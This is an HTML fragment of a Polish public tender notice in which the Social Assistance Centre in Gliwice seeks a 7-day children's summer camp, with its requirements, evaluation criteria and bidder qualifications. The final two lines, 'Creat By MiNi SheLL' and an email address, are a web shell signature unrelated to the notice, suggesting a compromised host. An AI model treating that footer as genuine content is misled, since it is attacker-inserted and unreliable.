profilaktyczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A. Wymagania dotyczące ośrodka wypoczynkowego:<br/>-miejscowość na terenie Polski w odległości drogowej maksymalnie do 300 km od siedziby Ośrodka Pomocy Społecznej w Gliwicach, ul. Górnych Wałów 9;<br/>-liczba miejsc wystarczająca na zabezpieczenie w trakcie trwania realizacji zamówienia pobytu maksymalnie: 38 dzieci w jednym turnusie;<br/>-teren ośrodka musi być uporządkowany, oświetlony i ogrodzony;<br/>-zakwaterowanie uczestników nastąpi maksymalnie na czterech kondygnacjach nadziemnych w jednym budynku. Kondygnacja nadziemna rozumiana zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tj, Dz.U. z 2022r. poz.1225.);<br/>-nie dopuszcza się zakwaterowania dzieci w kilku budynkach;<br/>-pokoje wychowawców powinny się znajdować na tych samych kondygnacjach co pokoje dzieci;<br/>-zgodnie z Rozporządzeniem Ministra Edukacji Narodowej w sprawie wypoczynku dzieci i młodzieży z dnia 30 marca 2016r. (Dz.U. z 2016r. poz.452 ) obiekt, w którym będzie zorganizowany wypoczynek musi spełniać wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska. Organizator wypoczynku jest obowiązany zapewnić uczestnikom wypoczynku bezpieczne i higieniczne warunki w czasie wypoczynku. Budynek wraz z przyległym terenem powinien być pozbawiony przedmiotów i urządzeń mogących stwarzać zagrożenie dla bezpieczeństwa dzieci.<br/>-sala - świetlica ze sprzętem RTV, sprzętem nagłośniającym do organizacji dyskotek, przystosowana do prowadzenia zajęć dydaktycznych i wyposażona w gry planszowe, książki i czasopisma. Sala powinna pomieścić jednorazowo co najmniej 38 dzieci oraz wychowawców;<br/>-możliwość nieodpłatnego i nieograniczonego korzystania z boiska bez konieczności dojazdu oraz ze sprzętu sportowego niezbędnego do uatrakcyjnienia zajęć w ilości dostosowanej do liczby uczestników przebywających na poszczególnych turnusach<br/>B. Termin, tryb i sposób realizacji zadania<br/>-w okresie pomiędzy 01.07.2023 r. – do 31.08.2023 r.<br/>-maksymalna liczba uczestników jednego turnusu: 38 miejsc<br/>-minimalna liczba uczestników jednego turnusu wynosi 30 osób<br/>-liczba dni trwania turnusu -7 dni (6 noclegów).<br/>C. Warunki zakwaterowania<br/>-pokoje maksymalnie 4 osobowe z dostępem do okna, przy zachowaniu 4m2 powierzchni noclegowej na jedną osobę, przy założeniu że w jednym pokoju są uczestnicy z tej samej grupy, w której prowadzi się zajęcia w trakcie wypoczynku;<br/>-każdy pokój powinien być wyposażony w łóżka lub tapczany jednoosobowe (wyklucza się łóżka polowe i tzw. dostawki) z pościelą i kocem dla każdego dziecka (z możliwością wymiany w razie zabrudzenia);<br/>-łóżka muszą być tak ustawione, aby umożliwiały swobodne przejście;<br/>-każdy pokój musi być wyposażony w szafę z wieszakami i pólkami w ilości zapewniającej rozpakowanie bagażu przez każde dziecko zakwaterowane w pokoju oraz w stół i krzesła;<br/>-meble powinny być sprawne technicznie;<br/>-nie dopuszcza się zakwaterowania dzieci w pokojach przejściowych;<br/>-wszystkie pokoje z dostępem do pełnego węzła sanitarnego wewnątrz budynku i na piętrach, na których zakwaterowane będą dzieci, z bieżącą zimną i ciepią wodą bez ograniczeń;<br/>-łazienki muszą być sprzątane codziennie;<br/>-liczba urządzeń sanitarnych i warunki sanitarne w łazienkach powinny być zgodne z rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tj. Dz. U. z 2022 r. poz. 1225);<br/>-możliwość korzystania z ogrzewania pokoi na wniosek uczestników w przypadku, gdy temperatura wewnątrz budynku spadnie do 18 stopni C;<br/>-obiekt powinien dysponować izolatką z dostępem do węzła sanitarnego.<br/>D. Warunki żywienia<br/>-stołówka usytuowana na terenie obiektu kolonijnego, dopuszcza się lokalizację w osobnym budynku;<br/>- stołówka i kuchnia powinna spełniać wymogi stacji sanitarno-epidemiologicznej<br/>-w ciągu każdego dnia pobytu zapewnione cztery posiłki: śniadanie, obiad, podwieczorek, kolacja;<br/>• Śniadanie: pieczywo, masło, wędliny, sery, warzywa, płatki śniadaniowe, mleko, jogurty, herbata, kakao, kawa.<br/>• Obiad: serwowany do stołu składający się z: zupy i drugiego dania z sałatkami, do obiadu napoje: kompot, woda mineralna, soki owocowe.<br/>• Kolacja: produkty podobne jak przy śniadaniu, mile widziane dania ciepłe, typu kiełbaski z wody lub rożna, pieczony drób, smażone ryby<br/>-w dniu przyjazdu dzieci na kolonie zapewniony obiad, a w dniu wyjazdu dzieci z kolonii przynajmniej śniadanie;<br/>-posiłki urozmaicone odpowiadające normom żywienia opracowanym przez Instytut Żywności i Żywienia zarówno pod względem ilości jak i jakości oraz wartości odżywczych, bogate w witaminy, duża ilość owoców i warzyw;<br/>-w czasie trwania pobytu zapewniony całodobowy dostęp do pieczywa oraz niskosłodzonego napoju lub wody;<br/>-suchy prowiant na drogę powrotną oraz na wszystkie ewentualne całodniowe wycieczki zorganizowane w czasie trwania turnusu.<br/>E. Transport uczestników<br/>-wykonawca zabezpiecza przewóz dzieci wraz z opieką na trasie Gliwice – miejsce docelowe oraz miejsce docelowe - Gliwice;<br/>-wykonawca zabezpiecza przejazd wszystkich uczestników turnusu w tym samym czasie autokarem/autokarami przeznaczonymi tylko do dyspozycji Organizatora;<br/>-liczba autokarów dostosowana do ilości uczestników;<br/>-autokar/autokary z czynną kabiną WC;<br/>-transport będzie zorganizowany zgodnie z ustawą z dnia 20 czerwca 1997 r. Prawo o Ruchu Drogowym (Dz.U. z 2023 r. poz. 1047);<br/>Organizator w dniu wyjazdu dzieci na kolonie jest zobowiązany przedstawić zaświadczenie o sprawdzeniu, bezpośrednio przed wyjazdem, przez odpowiednie służby stanu technicznego autokarów, którymi przewożone będą dzieci;<br/>-w razie wykazania przez organy kontroli niesprawności autokarów, wykonawca jest zobowiązany w ciągu 1 h do podstawienia sprawnych pojazdów zastępczych;<br/>-w czasie upałów wykonawca zobowiązuje się zapewnić wodę do picia dla dzieci na czas przejazdów na trasie Gliwice – miejsce docelowe oraz miejsce docelowe - Gliwice;.<br/>-postój w trakcie transportu powinien być zapewniony w miejscach gwarantujących ograniczony do minimum kontakt z osobami trzecimi;<br/>-zbiórka przed wyjazdem powinna być zorganizowana na terenie Gliwic w miejscu zapewniającym przestrzeń dla zachowania dystansu społecznego, jej miejsce zostanie ustalone z wyłonionym Wykonawcą przed podpisaniem umowy. Rodzice/opiekunowie odprowadzający dzieci nie powinni wchodzić do autokaru.<br/>F. Program wypoczynku:-Program profilaktyki uzależnień dla dzieci – realizowany zgodnie ze złożoną ofertą.<br/>Program powinien obejmować np. bloki tematyczne dotyczące relacji interpersonalnych, kształtowania umiejętności w zakresie rozwiązywania problemów uzależnień, stresu, agresji<br/>i innych emocji oraz zagrożeń płynących z kontaktu dzieci i młodzieży ze środkami psychoaktywnymi.<br/>Realizacja programu podczas kolonii - minimum 10 h zajęć profilaktycznych dla wszystkich dzieci w czasie trwania każdego turnusu, przez osoby takie jak terapeuta uzależnień, pedagog, socjoterapeutka, pracownik socjalnym realizującym program profilaktyczny.<br/>- Program kulturalno – sportowo – rekreacyjny – realizowany zgodnie ze złożoną ofertą*.<br/>Organizator zobowiązany jest zorganizować co najmniej jedne zajęcia bądź zawody sportowe dla dzieci i młodzieży oraz co najmniej jedną dyskotekę.<br/>Organizator musi zagwarantować dostępu do boiska na terenie ośrodka.<br/>Organizator zobowiązany jest zorganizować co najmniej jedną wycieczkę pieszą lub autokarową gdzie plan wycieczki będzie uwzględniał możliwości turystyczne i kulturowe regionu np.: szlaki edukacyjne, zwiedzanie okolicznych pomników, miejsc pamięci, oraz innych charakterystycznych dla okolicy atrakcji turystycznych z zapewnieniem przez Organizatora opłacenia wszystkich biletów wstępu do zwiedzanych obiektów.<br/>Organizator wypoczynku zorganizuje jedno wyjście do Aquaparku.<br/>G. Kadra:<br/>- kierownik i wychowawcy posiadający uprawnienia zgodne z Rozporządzeniem Ministra Edukacji Narodowej w sprawie wypoczynku dzieci i młodzieży z dnia 30 marca 2016r. (Dz. U. z 2016 r. poz. 452.),<br/>- osoba realizująca program profilaktyczny,**<br/>- animator zajęć sportowych**<br/>**animator i osoba realizująca program profilaktyczny nie może jednocześnie pełnić funkcji kierownika lub wychowawcy<br/>Osoby zatrudnione przez Wykonawcę powinny posiadać minimum roczne doświadczenie<br/>w pracy dydaktycznej, wychowawczej lub opiekuńczej z dziećmi. Ponadto wychowawcy powinni posiadać udokumentowane doświadczenie w pracy jako wychowawca na co najmniej 3 turnusach wypoczynku (kolonii, obozu, zimowiska). Kierownik powinien posiadać udokumentowane doświadczenie w pracy jako kierownik kolonii na co najmniej 3 turnusach wypoczynku (kolonii, obozu, zimowiska).<br/>Organizator musi dysponować Terapeutą uzależnień/ pedagogiem/ socjoterapeutą/ pracownikiem socjalnym realizującym program profilaktyczny, który musi posiadać przynajmniej roczne udokumentowane doświadczenie w prowadzeniu zajęć z osobami dorosłymi/dziećmi lub młodzieżą z zakresu profilaktyki uzależnień.<br/>Osoby zatrudnione przez Wykonawcę muszą zostać sprawdzone w Rejestrze Sprawców Przestępstw na Tle Seksualnym (RSPTS), zgodnie z ustawą z dnia 13 maja 2016r.<br/>o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym (tekst jednolity Dz. U. z 2023r. poz. 31)., oraz o niekaralności w Krajowym Rejestrze Karnym Sądu Rejonowego zgodnie z art. 21 ust. 3 Ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym i ochronie małoletnich. Wydruk z rejestru należy dołączyć do dokumentacji kadry. Wychowawcy oraz kierownik kolonii powinni być obecni na terenie ośrodka przez cały okres pobytu dzieci na kolonii (za wyjątkiem ewentualnych wycieczek).<br/>CAŁKOWITY OPIS PRZEDMIOTU ZAMÓWIENIA ZNAJDUJE SIĘ W ZAŁĄCZNIKU NR 7 DO SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55243000-5 - Usługi w zakresie obozowisk dla dzieci</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">63500000-4 - Usługi biur podróży, podmiotów turystycznych i pomocy turystycznej</p> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie kryteriów oceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">atrakcyjność lokalizacji obiektu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">standard sanitarny w obiekcie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">program rozrywkowo - rekreacyjno-sportowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">program profilaktyczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolność do występowania w obrocie gospodarczym- Określenie warunku:Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów- Określenie warunku:<br/>Wykonawcy muszą być wpisani do Rejestru Organizatorów Turystyki i Pośredników Turystycznych prowadzonego przez Marszałka Województwa, zgodnie z wymogami zawartymi w ustawie z dnia 24 listopada<br/>2017 r. o imprezach turystycznych i powiązanych usługach turystycznych (Dz. U. z 2023 r. poz. 2211), a w przypadku podmiotów zagranicznych posiada stosowne zezwolenie, jeżeli jest wymagane do prowadzenia<br/>działalności turystycznej, wydane w kraju siedziby Wykonawcy - wraz z zasięgiem terytorialnego wykonywania działalności obejmującej miejsce Imprezy<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada<br/>uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>3. Sytuacja finansowa lub ekonomiczna<br/>Określenie warunku:<br/>O zamówienie mogą ubiegać się wykonawcy, których sytuacja ekonomiczna i finansowa pozwoli na prawidłowe wykonanie zamówienia. Wykonawcy przedstawia dokument potwierdzający o posiadaniu ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50.000,00 zł na jedno dziecko.<br/>4. Zdolność techniczna lub zawodowa- Określenie warunku:<br/>O zamówienie mogą ubiegać się wykonawcy, którzy posiadają wiedzę i doświadczenie, które pozwoli na prawidłowe wykonanie zamówienia.<br/>Wykonawcy muszą wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali usługę w zakresie odpowiadającym<br/>przedmiotowi zamówienia, tj.: 1 usługę polegającą na zorganizowaniu letniego wypoczynku dla co najmniej 100 osób - dzieci i młodzieży o wartości co najmniej 150.000,00 zł<br/>O zamówienie mogą ubiegać się wykonawcy, którzy posiadają potencjał techniczny który pozwoli na prawidłowe wykonanie zamówienia:<br/>1) Wykonawcy muszą dysponować: autokarem spełniającym warunki zgodnie z ustawa z dnia 20 czerwca 1997 r. Prawo o Ruchu Drogowym (Dz.U. z 2023 r. poz. 1047); liczba autokarów dostosowana do ilości uczestników; autokar/autokary z czynna kabina WC; w dniu wyjazdu dzieci na kolonie jest zobowiązany przedstawić zaświadczenie o sprawdzeniu, bezpośrednio przed wyjazdem, przez odpowiednie służby stanu technicznego autokarów, którymi przewożone będą dzieci;<br/>2) Wykonawca musi zapewniać budynek o odpowiednim standardzie technicznym, tj. należycie zabezpieczonym w sposób uniemożliwiający wstęp osobom obcym, z zabezpieczeniem przeciwpożarowym. Teren ośrodka ogrodzony, pokoje z dostępem do okna, dostęp do łazienki, sanitariatów<br/>O zamówienie mogą ubiegać się wykonawcy, którzy posiadają osoby zdolne do wykonania zamówienia, tj.:<br/>- kierownik i wychowawcy posiadający uprawnienia zgodne z Rozporządzeniem Ministra Edukacji Narodowej w sprawie wypoczynku dzieci i młodzieży z dnia 30 marca 2016r. (Dz. U. z 2016 r. poz. 452.),<br/>- osoba realizująca program profilaktyczny,*<br/>- animator zajęć sportowych.*<br/>*animator i osoba realizująca program profilaktyczny nie może jednocześnie pełnić funkcji kierownika lub wychowawcy<br/>Osoby zatrudnione przez Wykonawcę powinny posiadać minimum roczne doświadczenie w pracy dydaktycznej, wychowawczej lub opiekuńczej z dziećmi. Ponadto wychowawcy powinni posiadać udokumentowane doświadczenie w pracy jako wychowawca na co najmniej 3 turnusach wypoczynku (kolonii, obozu, zimowiska). Kierownik powinien posiadać udokumentowane doświadczenie w pracy jako kierownik<br/>kolonii na co najmniej 3 turnusach wypoczynku (kolonii, obozu, zimowiska).<br/>Organizator musi dysponować Terapeuta uzależnień/ pedagogiem/ socjoterapeutą/ pracownikiem socjalnym realizującym program profilaktyczny, który musi posiadać przynajmniej roczne udokumentowane<br/>doświadczenie w prowadzeniu zajęć z osobami dorosłymi/dziećmi lub młodzieżą z zakresu profilaktyki uzależnień.<br/>Na dowód należy dołączyć referencje lub inne dokumenty potwierdzające posiadanie doświadczenie przez wymagane w zamówieniu osoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">SKŁADANE WRAZ Z OFERTĄ:<br/>•	oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o treści ZAŁĄCZNIKA NR 2 do SWZ,<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie (np. konsorcjum, wspólnicy spółki cywilnej). Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji oraz brak podstaw wykluczenia.<br/>•	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, ze stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów. Przykładowy wzór zobowiązania podmiotu udostępniającego zasoby stanowi ZAŁĄCZNIK NR 10 do SWZ.<br/><br/>SKŁADANE NA WEZWANIE ZAMAWIAJĄCEGO:<br/>•	odpis lub informacja z Krajowego Rejestru Sadowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast powyższego dokumentu składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, ze nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sad, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem,<br/>•	oświadczenie wykonawcy, w zakresie art. 108 ust 1 pkt 5 ustawy pzp, o braku przynależności do tej samej grupy kapitałowej o treści ZAŁĄCZNIKA NR 5 do SWZ w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawca, który złożył odrębną ofertę, ofertę częściowa lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>•oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy pzp o treści ZAŁĄCZNIKA NR 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">SKŁADANE WRAZ Z OFERTĄ:<br/>•	oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o treści ZAŁĄCZNIKA NR 2 do SWZ,<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>•	zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, ze wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części,<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, ze stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów. Przykładowy wzór zobowiązania podmiotu udostępniającego zasoby stanowi ZAŁĄCZNIK NR 10 do SWZ.<br/>SKŁADANE NA WEZWANIE ZAMAWIAJĄCEGO:<br/>•	dokumenty potwierdzające, ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjna tego ubezpieczenia określona przez zamawiającego. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, o których mowa w niniejszym tiret wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego warunku<br/>•	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału<br/>w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane o treści ZAŁĄCZNIKA NR 8 do SWZ, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu<br/>składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu.<br/>•	wykaz osób, skierowanych przez wykonawce do realizacji zamówienia publicznego wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami o treści ZAŁĄCZNIKA NR 9 do SWZ,<br/>•	zaświadczenie o wpisie do Rejestru Organizatorów Turystyki i Pośredników Turystycznych prowadzonego przez Marszałka Województwa</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy bez przeprowadzenia odrębnego postępowania o udzielenie zamówienia we wskazanych niżej przypadkach i pod następującymi warunkami:<br/>Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 455 ustawy Prawo zamówień publicznych. Warunki dot. zmiany umowy opisane są w załączniku nr 6 do SWZ- Wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-05 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com